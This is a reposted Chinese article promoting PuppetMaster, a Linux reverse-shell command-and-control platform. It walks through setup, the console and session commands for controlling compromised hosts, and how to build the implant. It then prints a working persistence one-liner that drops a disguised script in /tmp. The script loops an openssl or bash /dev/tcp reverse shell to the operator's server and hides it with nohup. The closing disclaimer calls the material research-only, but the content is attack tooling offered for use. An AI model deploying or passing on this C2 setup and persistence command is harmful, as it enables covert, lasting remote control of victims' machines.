【非作者-非原创】PuppetMaster-Linux C2端项目

admin 2024年7月30日23:38:43评论15 views字数 1367阅读4分33秒阅读模式

看前声明:此工具为Rebel开发,本文仅帮朋友推广宣发~有问题请联系作者

项目介绍:Linux反向shell中控平台,主体零第三方依赖及轻量化异步,默认自带无限制持久化,防止任何服务端意外导致权限丢失。

启动流程:

git clone https://github.com/R4be1/PuppetMaster.git
cd PuppetMaster
vim Master.py #这一步是修改host变量为自己的服务器ip
python3 Master.py #启动!而后会给出基础/加密反弹shell的命令

【非作者-非原创】PuppetMaster-Linux C2端项目

第一次使用注意修改Master主程序中的host变量,把127.0.0.1改为你的服务器公网ip,否则默认持久化命令会将权限持续反弹到127上。

硬性Windows平台用户注意:Windows报错缺少readline库是因为Windows版的Python官方库中不包含readline,在Windows上pip install readline也会报错,如果一定要在Windows平台上跑的话可以把import readline改成第三方库或直接注释readline相关的行(就三行,但会缺少补全功能)

反弹shell后可执行sessions效果如下,包含总会话数,hostname,username,CPU核心数,远程地址,上线时间,ip归属(纯真ip库大概精确到市或单位)

【非作者-非原创】PuppetMaster-Linux C2端项目

详细使用命令:

Master Console(在控制台时):

  • BATCH-EXECUTE :批量命令执行(目前只支持全部批量,部分批量有待考量)

  • sessions :列出所有会话

  • use :使用指定会话(tab键补全)可使用远程连接的地址如(1.1.1.1:12345)

Session(在使用use之后,可使用bg返回控制台):

  • sessions :列出所有会话

  • execute :命令执行(execute ps -ef)

  • shell :交互式Shell

  • close :关闭当前会话(不会杀掉持久化进程)

  • bg :会话/shell中可回退且不关闭会话

Make Implant:

修改服务端IP:

【非作者-非原创】PuppetMaster-Linux C2端项目

cd SSL-shell && make linux 即可,而后会生成sslshell这个文件。

持久化作者使用的命令:

[ ! "$(ps -ef|grep /tmp/.httpd-monitor.80|grep -v grep)" ] && echo "while true;do (mkfifo /tmp/-;bash -i</tmp/-|&openssl s_client -quiet -connect 127.0.0.1:47443>/tmp/-;rm /tmp/-)||(bash -i>&/dev/tcp/127.0.0.1/47080 0>&1);sleep 474;done;">/tmp/.httpd-monitor.80 && chmod +x /tmp/.httpd-monitor.80 && (nohup bash /tmp/.httpd-monitor.80 >/dev/null 2>&1 &)

解析:先判断进程中是否存在/tmp/.httpd-monitor.80特征,而后每474秒循环反弹shell(如果加密shell没报错则优先加密shell,否则基础反弹shell)

原文始发于微信公众号(樱花庄的本间白猫):【非作者-非原创】PuppetMaster-Linux C2端项目

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月30日23:38:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【非作者-非原创】PuppetMaster-Linux C2端项目https://cn-sec.com/archives/2995468.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息